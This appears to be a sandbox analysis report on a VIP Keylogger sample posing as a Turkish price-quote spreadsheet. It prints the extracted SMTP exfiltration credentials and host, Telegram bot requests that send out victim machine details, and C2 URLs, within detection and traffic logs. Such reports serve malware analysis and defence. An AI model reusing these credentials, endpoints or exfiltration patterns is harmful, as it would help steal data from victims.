Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49729 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49768 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49788 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49871 version: TLS 1.2

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: vamE.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, YzkHZRBcm.exe.0.dr
Source:	Binary string: vamE.pdbSHA256 source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, YzkHZRBcm.exe.0.dr

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 0133F8E9h	9_2_0133F631
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 0133FD41h	9_2_0133FA88
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 012BF8E9h	14_2_012BF631
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 012BFD41h	14_2_012BFA88
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 059264E0h	14_2_059261E8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05925066h	14_2_05924D98
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05923076h	14_2_05922DA8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 059210BEh	14_2_05920DF0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05927800h	14_2_05927508
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592EF88h	14_2_0592EC90
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05922756h	14_2_05922488
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592D7A0h	14_2_0592D4A8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592079Eh	14_2_059204D0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592A7D0h	14_2_0592A4D8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592BFB8h	14_2_0592BCC0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05928FE8h	14_2_05928CF0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05924747h	14_2_05924478
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592EAC0h	14_2_0592E7C8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 059222C6h	14_2_05921FF8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592BAF0h	14_2_0592B7F8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592D2D8h	14_2_0592CFE0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 059242B6h	14_2_05923FE8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 059219B7h	14_2_05921710
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05928190h	14_2_05927E98
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05929978h	14_2_05929680
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 059269A8h	14_2_059266B0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05925986h	14_2_059256B8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05923996h	14_2_059236C8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592E130h	14_2_0592DE38
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592F918h	14_2_0592F620
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592C948h	14_2_0592C650
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592B160h	14_2_0592AE68
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592C480h	14_2_0592C188
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 059294B0h	14_2_059291B8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592AC98h	14_2_0592A9A0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05927CC8h	14_2_059279D0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05922BE6h	14_2_05922918
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05924BD6h	14_2_05924908
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592F450h	14_2_0592F158
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592DC68h	14_2_0592D970
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05920C2Eh	14_2_05920960
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592A308h	14_2_0592A010
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05928B20h	14_2_05928828
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592030Eh	14_2_05920040
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05927338h	14_2_05927040
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592CE10h	14_2_0592CB18
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592E5F8h	14_2_0592E300
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592B628h	14_2_0592B330
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05923E26h	14_2_05923B58
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05925EB7h	14_2_05925B48
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05929E40h	14_2_05929B48
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05926E70h	14_2_05926B78
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05928658h	14_2_05928360
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05921E36h	14_2_05921B68
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592154Eh	14_2_05921280
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 0592FDE0h	14_2_0592FAE8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 05923506h	14_2_05923238
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 4x nop then jmp 059254F6h	14_2_05925228

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2020:57:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:07:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49744 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49783 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49758 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49796 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49722 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49775 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49812 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49776 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49800 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49798 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49729 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49768 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49788 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2020:57:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:07:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 12:52:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 12:52:38 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
